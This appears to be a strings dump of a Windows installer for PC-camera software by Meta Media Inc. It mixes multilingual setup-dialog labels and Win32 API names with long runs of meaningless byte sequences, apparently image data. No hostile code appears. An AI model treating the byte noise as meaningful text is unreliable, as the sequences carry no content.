-+*ADB>?;895AB@FGEIIIFEG*,-!#$SUVDCE=;;;;;&&&RRRa`bSUVV[^V[^AEJaejRWZ!$(
-+*ADB>?;895AB@FGEIIIGFH*,-!#$SUVDCE=;;;;;&&&RRRbacRTUW\_V[^AEJ`diRWZ"%)
A~dB|d<u`4lY1gV*_Q!XI'[J1[J)G:)G:
A~dC}dA{c;t_4lY1gV*_Q"WI&ZI1[J)G:
(add control panel to Start Menu)
;@ADFG
>@ADFGSUVjik~||
>@ADFGSUVlik
\^}ADj/6]28c39h29k4;m17f.4c28e0:i0:i1;j4<k5;j48h48h26f/3f04g48k4;m5;p:@uEJ
ADL4:?[be
ADL6:?[cc
aD=lC:
 ADMnPY{JRwIQv`f
ADVAPI32.dll
AE4C57'
ae~5@\+=Z+:T?Ia^g
a_ea_e'
a[}e_|a]v_]t[YvZY{^Y~WO
aexbh{
aexcj{
aeYL;.RA8SB9YD<X=3dE6nL<tUFxYJ~]N
]af165QEA
^afaagfimrttz{yzxwupotmjvrmyvquqpsqpceeMOO
[af\eifknptusxw
[af\eigloptutyx
=AFGLOQZ^\_g`ckps{|~
=AFHKORX]]`hadlps{|~
AFI>?C237<>?245?AB:<=KMN:9;CBDA@BBDECEEsuu\^^HHHIGGE@AC?>JEFOJKYUTXVUghfdih
AFI<?C348=?@245>@A:<=KMN79:CBDC@BBDDCEErus\_]HHHIGGEA@C?>JEDQLKZUTXVUfigdih
afo^bgjryx
afo^bgjryy
AFw9BtCH
/ag']d
AGd6B^)6P-8S'2M)4P3?[2=[4?]3>\0;W7B^6@^5>_6?`1<\8Ee<Ii;Gi;Jk.>b3EjCQuANtGS{MW
agfdqo
agferp
A%#G$#J
AGlEOwEMuFNsPWxNUvT\zX`~T\zNVtKUsBKlGRrISuIQvENsFOtJSyQZ
AGN?EL7;@=AF:>CDIL?BFHKO?BFDHIBEIHMPLQRsyxY_^=??BBB>9:?:;@;<JFENJIMKJNLKBDDy~
AGN?EL7;@=AF;?DCHK>CFHKO@CGDHICFJFMPJRRsyxY_^;@?BBB?:;@<;A<=JFENJIMKJNLKACCy~
aG~O9~L8
AGr8As8Cw5@r0:j+4f+2c&+\
agX \s
AHc5A]*7Q-8S'2M)4O4@\3>\4?]2=[0;W7B^6@^4=^7@a1<\8Ee9Hh8Gg;Jk.>b4FkCPvANtHT|LX
aheUc_
aheWb_
//AHL[^Xgi
aHM;4T>8aGAhLEzO@
aHM;4U@8aGAhLEzO@
AhqAemQsyKkpMjnPmqMklRpq`|}}
AhqAemQsyLjoLimOlpMklRpq`|}~
ahqVshTt`N}^I{WG
aHtyY_
aHU@8aGAhLEzO@
ahwZdnYgsb|
ahyS]n=GY5AS4BT6DW6DW1?Q:FX@L^:FX/;S%/G.6MQXkPViKLaIG]HD]
ahyS]n=GY5AS4BT6DW7EX2@R:FX@L^:FX.:R%/G.7KQXkQVkKLaJH^IE^
_ai2/8:06A69I>AG<D0K_.L_.Na/P_1N]0M\2N_2Ma/M^*JW/LZ.KY2S\>_hHcmL]jBN`0@P+>K)=H(>I'?K(>J+AM)CO%>H'9@)25*05.2703832;54=36;6<A:AD3@>0><.?<,>=+?@(;>&8?(7@'7=&58*6:)57%13$21%24#24'35)25(14)25'35%13'03)25'03'11&00&/2)25)25,58*44)33,88/7709<:?@8BBAPSRotp
_ai4/8:06B7:I>AG<D/J^-K^.Na/P_1N]/L[2N_2Ma/M^*JW/LZ/LZ2S\>_hHcmL]jBO_0@P+>K)=H(>I'?K(>J+AM)CO&?I'9@)25,05/3803832;35=26;7=B:AD3@>1></@=,>=+?@(;>&8?(7@'7=&58*6:)57%13%11%24"13&24(14(14(14'35%13(14*36'03'03&/2'03)25)25,58+55)33+77/7709<:?@:BBAPRQnsp
Aide...
AII>DC
aI=lUE
A`iRmw
A`iRnu
!''-?AITV^MN\JQdZ^q>BTGLaAE^KVjQ[mSU`m_`
!''-?AIUW_NO]HRdZ^q>BTGLaAE]KVjPZlSTbm_`
aJB[A5uZL
AJe':U"6O;G_]d
ajmCOS?KQFRTFQUCMTAKRDNUCNR>IM;EL4=F08?6<CVWa
AJN7CEbpo
AJS/7>CKR#,5&/<!*8`^
AJS/7>CKR#,5%.;!*8`^
AJT.5>.8?1<DUakkv
aJ{T>sN:jF4^A2mVG
Ajuda...
AJXZcpz
aJzU?sN:kG5^A2oUG
aKEbHAtTI
aKEeJ@qQF~YK
=a{KJ;2PE=ZPIZTObXQm`Xui_
AK(LV8_h1Ye'Q^!MZ"N[+Ra*R^(NZ3S`4O].HV,FT*ES/IY,M\*Q_+Ub/Yf.Xe(Ta+Wd7cp6cn0Zfo
AK(LV8_h/Ye'Q^!L["M\,Sa*R^(OX3S`4O].HV,FR*ES/IY+N\'Q^)Ub/Yf.Xe(Ta+Wd6bo6cn/Yeo
AK(LV8_h/Ye'Q^!L["M\,Sa*R^(OX3S`4O].HV,FR*ES/IY+N\'Q^)Ub/Yf.Xe(Ta+Wd8bo6cn0Zfq
%! # "%%+@AKWYcVYgJTfPVi8?PIPdCI`LWkS]oX^kpjk
Akx>hu5cu(Vh*Uj2]r;ex@k|Em
Akx>hu5cu(Vh(Uj3^s;ex?j{Em
%! # "%%+@AKXYcVYgJTfPVi8?PJQeDJaMXlQ\pX^kohk
A"!L14K8AE7C>/=<+9B1?G6CF4AL;FT@LWDMVDKQ>GM<EL9BN<IQ?LaBI
aldholu}|
Alle Rechte vorbehalten
All rights reserved
al~`mv[e|_h
a{{`;%mA$
a^}MLy><s94s94yR6sK2qC1o>4vIFtPPr98m;5lA>kIIhNN_IKYACZFEeMGgJArL:p@.pG8sRCnJ:rQAo^QkTLgTLeSHdTHbOHcPKhPJwZQtH;rA7pI;nC4n:*pC6kLCgLH^LKcE@gJCgUJoeTerZS
a^}MLy><s94s94yR6sK2qC1o>4vIFtPPr98m;5lA>kIIhNN_IKYACZFEeMGgJArL:p@.pG8sRCnJ:rQAo^QkTLgTLeSHdTHbOHcPKhPJwZQtH;rA7pI;nC4n:*pC6kLCgLH^LK_KFbMEhVKq[OrXHqN:wJ5sQ:
a^}MLy><s94s94yR6sK2qC1o>4vIFtPPr98m;5lA>kIIhNN_IKYACZFEeMGgJArL:p@.pG8sRCnJ:rQAo^QkTLgTLeSHdTHbOHcPKhPJwZQtH;rA7pI;nC4n:*pC6kLCgLH^LK^KFbMEhVKq[OrXHqN:wJ5tR:vO@rI:lC4gB4kC7qE>uIBsIBpIAnF:lC:oF=vI<uH=ySGwL=uC1pE2mF8gI>aH>]E9X?5[A:aF8kG7rB0p@.vJ=uQGr;6yUMlWOiSMiSMgTLbOHaMHaLJjTNtWNsH?qD7yQEt>7t40r13s46{P?xP>uL=tG<pRM{[\y@CsCApJJqRUjTVhQUYJN\JKcLPjNNtNIvJCtRR}bf}]b{ckyo{qjwmlunjvlgvjcrnaowfs
amsO^gSbkSdmUltay
amsO^gUakTenUltay
AMuAM}7F~5B
amwhr|dqyhx~
amwhr|dqyiy
AN>2ZI<qZK
A"!N36K8AF8D>/=;*8A0>G6CF4AL:GUAMXENVDKO>GN>EL9BN=HQ?LbCJ
an%ep1hu7Tb#CP <G
A$'N**fEB
A%%N**fEB
[anklvxty
[anklvxty~xy
Annuler
Annullare
Anuluj
Anzahl der kopierenden Datei 
AO>1_H8uZF
AowBjvNv
AowBktNv
AP=0_H9vXG
>APDHZRWlRXo`h
Ap~,fr-bo&_n+bq2eu-^n6iy7hx8fw.br)]m1gr:oy9my.do&]f&Zg'co$[h&]f.bo<m{.fq3jw*eo!Vc0er)^r'[l
a Play
Aplica
Aplikacje
app%d_delete
app%d_name
app%d_path
Applicacion
Application
Application Software Installation
Applicazione
Applikation
appmgmts.dlld
aPuTEkL=cJ:dQDeWKi`WEA<
aq}cq}dp|jv
aQinXj
|aqlVhq^mr_ps]obKYZEM]INbJT^FPgOW
Aq}<lxBs}Hw
aQ~]M~\L
aQ~]N{ZK{ZJ
aQvM6~N6
aqwAOU9CJ,8>->A(;>#690LMQnr`}
aqwAOU9CJ,8>.?B(;>"580LMRpq`}
 archivi,
 Archivos,
ar|cwwczqbwwazu`vu^muXgz]lu[kpTgoXnmYvqb}sdyvfwyhu
aR{^Py]Ry^P
 arquivos,
aRwgZ>5,
aRxgZ>5,
Ar|$Yc,do*gq+it-iu5l{2fv.aq.aq0aq9jzCq
Ar|$Yc,do*gq,ju-iu5l{2fv.aq.aq0aq9jzCq
ARyMVw[g
arzdwwczqbwwazu`vu^muXgz]lu[kpTgoXnmYvqb}tezvfwyhu
aSkUIeODaLDePH
aS}\M|YK
A software total solution for pc-camera user
As sele
_asUUgKJZ@@N77E21A+-8()3)&/*#(2')1%%6'%<)&?)$F+'K,)Q/)T3*U5*X8+V9+V5"U3#`>.\>-J-
ASZ8KRK`b\no
ASZ8KRK`bYmn
aTpO@uRE|YL
at~SyoG
`atXWuVU
aUQ8..
Auto ausf
Auto executar (clicar aqui para executar o panel de controle para iniciar)
Auto marcher(click here to run control panel at startup)
autorun
Autorun
Auto run
Auto run (click here to run control panel at startup)
autorunfile
Autostart (startuj wraz z systemem)
, au total 
\av]ayZ^vQVkU[rPVmRVn^bzaf
%AVB:,
`avFMf<Ja.>U.?T0AV.AV/BW#4I(6L%6I'7H,:L9CU\`xru
`avFMf<Ja/?V0>U2@V.AV.AV$5H&7L%6I'6I/;M;CT\`xru
~avlNn\=sW9
A(v;!r8
avx`uwl
a^w54H@>RGDZNKaRPdRQeOPeKKcNNfPRjGJ_HL_lo~
AWC8iSH
'Aw&;h
%\A"W< P6
[axIQhGPdBK_:E[6AU3>R-9KZat_h|6BZ2E`5AYEMdpw
[axIRfGPdDK_:EY6AU3?Q/9KY`sah|6BZ4E_5AYEMdpw
aXkTL_LE_NE]LC
aXkTL_LE]NE]LC
%\A#X= P6 J1
`a|`_~`_~\\~_\|`Y
A(y9 z<$w;%r5!~<)
_aycc{gg
?^aY:+mJ6
aYPGYJGWLH`NMfTSgSR~dd
Ayuda...
|A?y><{@>y><x=;y><z?=z?={A<
&Az0K~>T
-AZ2C^5C_?KgRZxR\zT^|EPp5@`9Dd:Ee<Gg:Ij8DfBNpJUu?Jj6Aa0:\8AcFOtXa
-AZ2C]6D`?KgOYwR\zT^|FOp5@`9Dd:Ee:Gg:Ij8DfBNpHUu?Jj6Aa1:[8AbFOtXa
A.Z7*c=1vJ=
>{a>zb@yd4oZ0hU.eV)^P*_Q3YM)C6
?$|>&azfZzb[w`c{cav]_oX`n\XkVScRPbUI]PF_QE\NGYLHYLNWJO\LOYIPPBMP@GO8B@(=,
][a><<[ZV
aZ}^Wx\Uv[VuZUr]Y}ZY
@ !B(!?%
B$~> }=
B&|=!}=
B&}< }=
B,!>0*:.*8-)>0*?.+D)%D$
B0PjwV
B0)R50dFA~XT
!b1.{A
b2&b6)a7*S&
"& #B3
*$%B:;3(*(
b;3c?7zTH
b4#o<(
b5'k<'s?(yA({>$
%= *B.5P<E`AI`=D]<C\@Gb@GbBMaCOgMVqRYrW^w^f}bj
B6D.(3*!9/(I:7]J=iLEoKCwRD
B6j*:m*K
>"!B-6NCSULaUIeQDdK<\I:ZJ:YK:UQ>YR?XS@YYF_WF[]H^mP_
B6Z@:`JDv\P
"#!$B7
=B[7;WGJfaayro
B:~@8}@6
B,&@*%8,&;+%<,&@,'B# D!
B,&?)$8,&;+%;+%?+&B*$D&!B(!A%
B,&@*%8,&;+%<,&@,'B*$D&!B(!A%
B,&@*%8,&;+%<,&@,'B*$E'"B(!A%
b90o@2
[/(b=9J61(
b9*wZKwdWI@7#
B9X@:[B8XE6`I9aB+kH.xQ5
$B}%A}.F
\baflk~
Baj?Ye"?H@]f7S^A\jJes-JSFcj8T[.HN?W]D\b5KQ>QX
#:BAKVScqm
#:BAKVSdrn
baqHCXWQh
ba'wx1
'B{*Ay9M|Qd
B$#B*2K<JODXK>XE7OA1I:*B;)@?*@J7HR@QQ?PdQd`M^WBQ`IXdGP
B#$B*2K<JODXL=XE8PA0K:*B;)@@+AK7JR@QR@QdRcaN]WBQ`IXdGP
B)%B2+N=4fSK}dZ
B<~B<}?9~@:
bbbiii
bB<eA7sL>
|bb}hgyjg
 <#&B#&B+-L17\5Aq7G|5F
bbnIEkKFlLFlMDnNHlLGmLIoNKlML
(^$B|C`
B|cAyb>va8p[2fU(\K$ZI$\I"YF'XJ'XJ$KC
|B|cAyb=w_8q\8n].aS*]O%_M%\M"WI"WI
B|cBzc<v^7p[6m\,bQ(^M(_P
B&c|`]}dY{cYxcTr_To_Sl^SfUQcRL\JL\JK\GF\J@ZL?\MC]ON_QP\HN^GGWECM=48,64*kYX
BC]FUWMcPKZEYYK
]bcglm~
[b{^c|ms
BcsJk{v
BcsLj{w
BDE;:<546134045355355045/47OST
BDE;:<546134045355355056156NSR
B'!D'#L+)S,-Y00^03`-0\(*S'&N&$N'&P)/X(1\$1]#2`*0]+1\0:i=IsM\
[b{^d{ms
BDPjzV
B|d;s^7oZ1eS.\O8cV2]P$=3
bdvU`vTby[j
"bd	WVS
[beclow
[beclpx
\;BE&-dGP
=BEDILPY]`jqhrygqxoy
Beenden
BeginPaint
bei?ABPPP
bE<jJ=}[N
[b{_e|nt
Benutzerhandbuch nach Festplatte kopieren (
[bePUVflk
[b{^e~r|
BFi:>aEHg~
BF{ )U
bfz^dt\dnW\kZ]w\`|Y]
B=>GBAWRQhcdyts
B=>GBAWRQhceyts
B# G)(H,,M25K57Q;=F02K33S:8P73K20G.,K03U:>\@F
bgjhorjnomrq~
bgjhorjnomrq}
=#"B$%G'(J**N**N+,R)+S
BGJTVW
[b{_g~r|
bgTLOkN
BHkMSvms
BHmENyEMuHNsRWxPUvT[|X_
bHw}Z\
?*,B+)I93ZHGnYW
*B>I_lu
BitBlt
`bj;6?>58?47A69A7=/GY/J^0Na1O`0M\0L]1L`3Nb2O^,GU,FR+EQ7S^@_hPjvOar>L^0@P+>K*>I(>I*@L,?N0CR/?O-8F24>11732;54=58=5:=2<<1><6DB6DB1B?,<;*;>)<A(:A%7>%5;&4:&24*36+47'03&/2%13%24'46(46)25(14*36(46'35)25*36)25$..$..'03'03%.1-77/99*68-470<>6;<7>A>STRttu
`bj;7=>58?47A69A7=/GY/J^/M`0N_1N]/K\1L`3Nb2O^,GU,FR*DP7S^@_hPjvOar>L_0@Q,?L*>I(>I*@L,?N0CR/?O-8F13=11732;54=58=3:=2<<1><6DB6DB1B?,<;*;>);B(:A&8?%5;$4:'35+47+47'03$02%13$13'46(46)25)25*36)57'35)25*36)33$..$..&00'03&/2-77.88*68-470<>6;>7>A>SURttu
BJJ>DC
>Bk-4f")[
bKCdD9sK?
B^#Kg!Ib
bKI^<7
BKmIRwfo
BKmMUr\cwEJY
BKO7CEcqp
BKq(2Z%.Y-:h0<l2=o1<n/=n)7h*9j+:k
BKq(2Z%.Y-:h1=m2=o0;m/=n)7h)8i+:k
BKU.5>.8?1<DUakkv
bKx`BpkJfoNXyTL
bK~XFpQBjwoJ
b) l5(
bLcLDfNBmVGu[O|_V
bLcLDfNBnWGu[O|_V
bLFdKAtVK
bLfNBmVGu[O|_V
BLjDLiKWsPXuS\}nu
BLnFTp@UpK_xYq
bl}OYjgp~
bl~QYjgp~
@BL\VyZSx\UzWQtZTwZVyZY{RTwHNsIQvFNsIOtNUvOXzPY
@BL\VyZSx\VyXRuZTwZVyZY{SUxHNsIQvFNsGOtNUvOXzPY
BlyCp{Iw
/bl'Zd+[g-]i8dqEjxCerB_mD^jH`l9O[
/bl'Zd+[g-]i8dqEjxCerB_mD^jIam:P\
Bm|Dnzb
bMEdG9nI;}PB
bMEeLBtVK
bMEfNBtTG
@BMghv/0>
BMh7AYKSjow
BMh7AYLTkqw
@BMhiw/0>
bM{YIoOB]ys,
:bn2Zf3Xf5Wd>[iG_k;MX,<H!-7-7A5=J
Bn!@?g=
bnL	lM
bnx]iuamyiu
 *BN`z
bnzfo|lu
BO{AOyENyGQyAT
Bo|Bo|?mx4bmBozAn|.\m,Zl3as9dw7bs9ds3^m7^l8_h6Yf0Td0Zg&Q`)Uf-[l3dt0cs#Wg
Bo|Co|@mx4alBozAn|/]n,Zl3as9dw7bs9ds3^m7^l8_h6Yf.Uc1[h'Ra)Uf-[l1dt0dt$Xh
bo}cp~_kwYeqO[gP\fGT\DQY:EM=GN9AH1=C2;?5;@7?F7@D7@C7GMDbme
bO~]MyZKx[M
bO~]NyZKy\N
[B|O:pH6rE7
bo}`p}]kwYeqO[gO[eGT\ERZ:EM>HO8BI1=C2;?5;@6>E7@D7@C7GMDbme
BosHv~Iw
BosJu~Iw
bOzYIrUGqSHxZO
bOzYIrUGqSHzZO
,b":p#9m
BPlKUsny
BPm.9T
Bq-@4v@V[C
bqiO5'L.#I.$O3(V6+gI>uRDzUG|SD|YK
B-r7$s7'r7(q6&u@,
bR}\M~_P
B(rN4~vc
Browse...
Browse CD...
Browsen Sie die CD*
browser
bRpVJ_JHeJFeOIwb`
bRpVJ`KIeJFeOIxca}be
brq^poZpn\pqp
brq_qp[pn\pqp
\B{R<|S=
b`sHCXWQh
bS|_Qy]Rz_Q
bS|_Qz^Sz_Q
bs|RbhRacWfbKTJ11#aVHyeT
bs|RbhSbdXgcKTJ/2#`UG{dT
bsvNafI]bB[]@]b7W\2TZ+PX'NW0Yb<ao;_o9[k5Xf4Ta6P\;N[>O\=N[ATa@XdB[eXryf
bsvObgI]bB[]?\a7W\1SY+PX'NW0Yb<ao;_o7[k5Xf4Ta6P\;N[=N[<MZCTa@XdB[eXq{e
BSzLWwYg
BTA4aL=z\K
b`tKHsMIqMGqLDpJErMIqKIuNLsMM
bTlYLhVKnYQjWP
{btmpilpgqtisyms
[^b>>>TRQ
bTxWHvSF{XJ}\I
butterf.bmp
button
bUut`c
B?v83fLF{UR
b`vKHsMIrLGqLDpJEsMIsLJuNLsMK
bVR8..
]bw^bz[_wQVkV[pPVmRVn]czaf
bWkOER7-:I?KbVbSHR<1;,
bWkPFS7-:H>JbVbSHR<1;,
B)w<"p8
bW~^Q~[MyWGqO?uSC
bW~^Q~[MzXHrP@vTD
bW~^Q}ZLzXHqO?vTD
b_x64H@>RGDZOLbRPdRQeOPdKKcNNfPRjGJ_HL_lo~
B'#X73
'B{)@x9M|Qd
BX|AUx<Nm&3M
BX{AWzEZz<Po6D`&0H
BX{BX{FZ}<Op6Da'1I
[b}Xc~Q`zYj
(Bx(;h
bX}\LxZIz[L
bX}\Ly[Jz[L
bXQhXQpaX
+^B([?(X>&S8#N3
B# X 'X
b]}`[x`ZqWQ^KD_H@kRHvWNz]T
B&y9 z<$w;%r5!
?|b?ya?ya4oZ0hU.eV*_R*_R3YM)C6
`) b..yFNn<FyGS
bY}^OaNK]JG^HJoVZ{eg|dd}ee
!.?BYqqa}~LjoDdim
B:y),r
 bytes
 bytes)
byt)KA`
'!")#(+'-><BYX\NS\HO`\_tPQfV[pJRiS[r]cve_jxe`
`bzcc{gg
B)z:!{=%w;%s6"
BZx3JdE[wZo
$bz"Zo ^u \a
`]}`]}c`
`]c%!(
_\|_\|c`
*c#1b6BrFNv]c
*c#1b6CqFNv\b
C1E870B0C
C'1OQYvv
C2I<4ZHGqc]
C2U>6R=5T?7YD<aK@lQGzYP
C3DQI`VQlXRqXRuXR{bX
C3DRJaVQlXRqXRuXR{aW
+c 3l%7t(8z):},<
+c 3l&8u(8z):}+;
c4&f?0L/!)
/C4`ob
c<4xA2
C4yB9Q5*S8.V94W@8\B<eK?mSCyXI
[-%c5-\1(R(!_5.d:3\1(V+"_2'R%
&`!-c%/_+5d0;g>FnNV~ep
c5$h?0L/!)
c5$n;'
#C6A\{
*c'6n,:n5DuPb
%C.6TITpit
%C.6TKSpju
C' >.(70-9-+6,,7//<*+@#&D&+E+1D,6;*76)9<0FB6RC;Z=:Z@=]GCfIGkPKrJAiEEmBFo>GrFPxNZ|QVuVJfSAXR?XH9TH<XEFb>E`;C`<Db;BcBAaHD]P<SSBWbMcdQffYoYWkOLbGG_KI_TK`WBXZDW[HY]CU^=KhIRdENjIPnLRrW[qV_v_gseptisyms~rx
*c'7l*;n5DuPb
>"!C.7NCSRK`UIgQDdI;]I:ZI:YL:WP?ZP?ZTAZYG^WF[\G]mP_
#C8C^z
C){8!r2
C){8!t1
c8)uXIxeXKB9"
#C-8VDPl]i
#C-8VDPl]j
}}}C=>:()>+(9$"@+);*')FU'EV2R]@_b[tj
c?9qE8|H8
@%!C+%A+%?+&>'%=%
C' @+#A8.;WD/
CallWindowProcA
Cambiar el Directorio
Cancel
Cancelar
CancelConne
Cancellare
 cannot be run i
Can NOT copy 
Can NOT find program files to install.
Can not find setup.ini
c^~aZ{_Xy\Uv[VuZUr]Y}ZY
cB|cBzc<v^7p[6m\,bQ(^M(_P
C~bC|cBzc<v^8q\7m\,bQ)_N(_P
%C~&B~.F
!>"&C"&B*,N17\5Aq7G|6H
@_^;cb"TP _V,
CbVPr_W
C''C-2K6>M8AI4=H5>M;BJ8?H3;K7<O;@WDGJ5=C26L;?I5:V=A
cC8oL?|E8
cc{ac{]dxkr
cc{ac{]dxlr
[ccOUTflk
C''D-2K6>M8AG4=H5>M:CJ8?H3;K7<O;@WDGJ6;C26K:>K5:V=A
C}dAza?w`?w`7oZ0gT*`O(^M%\K
cD}dD|eC{f=q_9m\2eW,_Q%ZL([M*[K"VD
cD}dE}fD|g=q_9m[1dV+^P'ZL([M)ZJ"VD
CD`GVYMcPKZEZ[K
]C=dI?tYO
CD-ROM
cdxMTg8BT9GZ@K_BMa=H\2@S:H[AM_;GY+8N",DMSj`fymq
cdy`a{`d
cdyUYkHO^@FQ5;F17B.2=.0;*+5+'2+(1-).,(-,')0+-.&& 
cdyUYkHO^@FQ6<G17B-1<-/9*+5,(3,)2-)/,(--(*1*-.&& 
+c -e"0j"1o'5w*:|->
c,'e53
c\}e_}b^v`[t[Wx[W|^Y
c\}e_}b^x_[v[Wx[W|^Y
c\}e_}b^}ZVuXTuZVxf_nqa^
CEg9;]ORq
\_cEGH>;=CAAGCBHC@KDAHDCHFFCCCcef
\_cEMM@MKEQQERT@RSBUXFX_KY_P^dUciWfi^mpcqwdtzcu|cszXirRbnOalL^iGWhES_CLZ6:L69HCEOcci
%CEPpP]}JVxHTv`j
Ce software est prot
cewNUh8BT9GZ@K_BMa=H\2@S:H[>L^:FX*8N",DMSj`fymq
CFe9;]ORq
=$#C#$F#$F&'I++O**N+,R)+S
=$#C#$F&'I++O**N+,R)+S
_C<fMC~ZR
cfnYYe\\l_fubkuchqfeo`_iXZeSXaU^gXkrcs
Cfp@Yckwy
Cfp@Ycou|
_{{c|~g|}
C$!G)(H,,L14K57Q;=F02K33S:8O62K20G.,K03U:>\AE
CGj $GKMoy{
cG<pL<
C':gWj
CGxFIvgg
C%:gXk
cgz^dt]bnW[kZ]v[_~Y]
C&"H-)?$ <
C&!H-)A$ ;
ch}`d|Y]vUYrRVnONhDAZDBVDBVMK^SQd[Znecyll
ch}`d|Y]vUYrRVnONhDAZDBVMK^SQd[Znecyll
ch}`d|Y]vUYrRVnPOiDAZCAUOK^SQd[Znecyll
CheckDlgButton
:>CHJK
Choisissez 
Choose a Program Group
Choose Directory
cH:pL<
chten.
c^hTSdVXbWYfY[eYYcVTdTUgUVgUVhVWgUVbORcPShSVgRU_QS\KN\KNfQPsNJ}I=
c^hTSfUXbWYfY[eYYdWUdTUgUVgUVjUWhSUbORcPSgRUgRU_QS\KN\KNhPPsNJ~H=
chw[[{]\{b`
@Ci/7\17`39h29j4;l17f.4c28e29j0:j1;k1;k5:k39h39h17f/4e05f48k6:m5;p:@uFK
CIf0>[1<\ALjO[w8Ca9Dd9Dd5@^6Aa4?_8Ab>Ii=Hh@Jl>Hj<FhFOtIQvJRwGLsEIrZ^
CIf0>[/<\ALlOZx8Ca9Dd9Dd4?]6Aa3>^8Ab>Ii=Hh@Jl>Hj=FhEOqIQvIQvELsCIrX^
CIlIRwfo
CIP-25),0+*3,)22.41*14.34/0:56>:9
?*,C,*J96\HGpYW
`C>jD8
cj{dk|nu
`C<jF>~M?
CJ]TXpwv
Cjx>hu7bu(Vh*Uj2]r;ex@k|Em
cjyfkzmt
C}k0ma+oa&th(mY
C=>K@B[OOoc_~rn
C=>K@B[OOqb_
C>;KFCd[R{k^
ck|ho~
ck|T\mKTb=HV9DR4AQ$1A+3D$.?"0B
ck|U]nKTb?HV9CT4AQ$1A+3D"/?"0B
:cl0Zf2Yg4Vc>\gG_k9MX,<H!-7-6C6>K
:cl0Zf2Yg5Wd>\gG_k9MX,<H!-7-6C6>K
=Cl+2]!+Z
\cl9BP=HV9EW=H\CIfFHkLLtQWzWi
\cl9@O>GU;EV=I[AJeFGmJJrOUzXh
C>;LGDd[R{k_
<CL@GP9?FBDN=@HBHO<BI@FM>BGBGJ?BFAHKGOOpuvW]\6:;CCCCAA@<;A<=IDCPKHOKJJKICEEkpq
<CL@GP;>FBDN=@HCIP=CJ@FM>BGBGJ?BGBILGOOnvvW]\7<;CCCCAA@<;A<=JEDPKHOKJJKICEEkpq
(click here to run control panel at startup)
CLmO]ySg
CLmP^zSg
CloseHandle
C=>L@@]PNvc`{jg
cluepx[jsXhtdr~[gsQZgV`jIUaNZfWakKT]@FK>BGpux
cL[VAWQ>WO?^`PreVvM8XO5SR;[eUteWspc}xi
cL~YEuQ?gE5jI9fNB[K?^WN52-
cL~YEuQ?gE5jI:eMA[K?^WN52-
clzajxks
clz`iwks
c=|M2M0'ePSzch
c=|M2N1(ePS{di
CMkDLiKWsPYtT^|nv
CMuAM}9F~5B
c\naS^
Cn}Dnzb
C_NEjQG
c`nIEmJFlLFlMDnNHmMHnMJnMJnLL
cns<jzE
cnv^kset}q}
]c[NVLBZKH\KHdXNl_Wsg]
cnv\lsct}q}
@Co8>m:Dt9Ft5Cs@M
@Co9?n:Dt9Ft4BrAN
C.,OAGP<AG47C57;)0<&+9&);)*8  7"%:'*7)*7%$<*)@+*A%$@#
C\OAN;8Q<;S><YB@aKEmQPyZY
cO|bIu^Gr]Dq^Bl[En_Fm^Ei]@dX@h\?k^=i\El]DhX6bQ2^M,WH%PA
cO|bIu^Hs^Dq^@l[En_Gn_Ei]@bXAg[@k^>j]El]DhX8bQ4^M-XI(QB
cO|bIu^Hs^Dq^@l[En_Gn_Ei]@bX@bXAg[@k^>j]El]DhX8bQ4^M-XI(QB
CoCreateInstance
co{eq}iu
co{fo|lu
Co|=gsEo|;fw&Qb(Sf/Zo9dw;gx9ev>kyCmz@ir1Ye&P]"N[
CoInitialize
c`~oltlmwlnvhl~su
COMCTL32.dll
Commencer Menu(add control panel to Start Menu)
Company
compress
\control
control panel)
Copiando el numero del archivo 
Copiar archivos a: 
Copiar arquivos para : 
Copiare archivi in : 
Copiare il manuale utente sul disco rigido (
Copiar el manual al dico duro (
Copiare numero di archivio 
Copiar n
Copiar o manual de usu
Copier fichier 
Copier le manuel d'usager (
Copier le nom
CopyFileA
COPY_FILES
Copy files to : 
Copying file number 
CopyLZFile
Copyright
Copyright.
Copyright 2000-2001,  Meta Media Inc.
Copyright 2001,  Meta Media Inc.
Copyro
Copy user manual to hard disk (
COsAMiFZsH_u_u
cos^lrhx
COs?MiFZsH_u_u
couYftVbtPanQaqPetOarTfwUevN^oP^p\fw_jxqz}
couYftVbtQanRaqPetOarSevUevO_pP^p\fw_jxqz}
cp|brv`lt_n}gs
cp|btv`lt_n}gs
Cp{=gsEo|;fw&Qb'Re/Zm9dw<hy:fw>kyCmz@ir1Ye&P]"N[
cPHdKApPE
Cp{>htEo|;fw%Qb(Sf0[n9dw<hy:fw<kyBly@ht3Ye(O]!MZ
cp~[hv\htR^jPajFW`Q^fFQYERZGRZ?JR9DL;DM<EN5>G1<D0<B3?A5AC4@B5>A5>A4=@7??8@@9@C7AHAX`_
cp~[hv\htR^jPajFW`Q]gFPZEQ[HS[?JR;DM;DM;DM5>G1;B0<B3?A5AC4@B5>A5>A4=@7??8@@9@C7AHBYa_
cplO^uWdqUbnR_
cP|wbd
cpx7?F(0766<;5:A7=<6;827:387033,/716:49;:>7:>9>A58=.7@DT`iy
cpx8@G(0777=;5:A7=>6=929:297053,/925;68<;?7:>9>A48=.7@DT`gz
CP<Z<|<
cq}cq}dp|jv
cQ*GV$EU*KZ4S\D``C_`Fbc>Wa4PW,HS-KV2R_5O_2O^5O_/HX.IW(BN)>F+=D*:F);F);F';F';F'=H&>J#=I$=G$6=#02$21%32&35(57'33)33+77*68'46(57)57.5858<46>7:?58<5=</=;.A>/CD.AD*<C+;B-;A1=A-:<5CB5BD0=?*79'35+79.88/996>>7?>9?>;A@<DCAGF@FEDFF@BB>A?>CACIDCIDFJEAGB>IF?LJEHFWNJ
cQ*GV$EU*KZ6S\C__C_`Fbc>Wa5QX,HS-KV2R_6P`2O^5O_0IY.IW(BN)>F*<C*:F*:F);F';F';F'=H&>J#=I$=G$6=!02"21%32&35(57'33)33*66+79'46(57*68/6949<46>69>58<5=<0=;0A>1CD.AD*<C+;B-;A0<@,9;5CB5BD0=?*79&35+79.88/996>=9?>9?>;A@<DCAGF@FECEE@BB>A?@CABHCDJEFJEAFD>IF?LJDGEVMI
cq}^iwu{
CQn?OlBSt@UqCVq8Ga,9O#/A
CQn/:V
c{{\qo
cqoTb`D}dE}fD|g=q_9m[1dV+^P'ZL([M)ZJ)ZJ"VD
cqoTb`E
cqoTb`E~eE~eE}fD|g=q_9m[1dV+^P'ZL([M)ZJ"VD
Creare gruppo :
Crear grupo :
CreateCompatibleDC
CreateDirectoryA
CreateFileA
Create group :
CreateProcessA
CreateWindowExA
Criar grupos :
c<.}`Rl[R7/(
c{{]rp
CRrIZuEYrgt
CRrIZuEZpgt
,cr Ub
CRUBOW#08#08;GS<JV
CRUDOW&19#089GS;KW
crypt'c
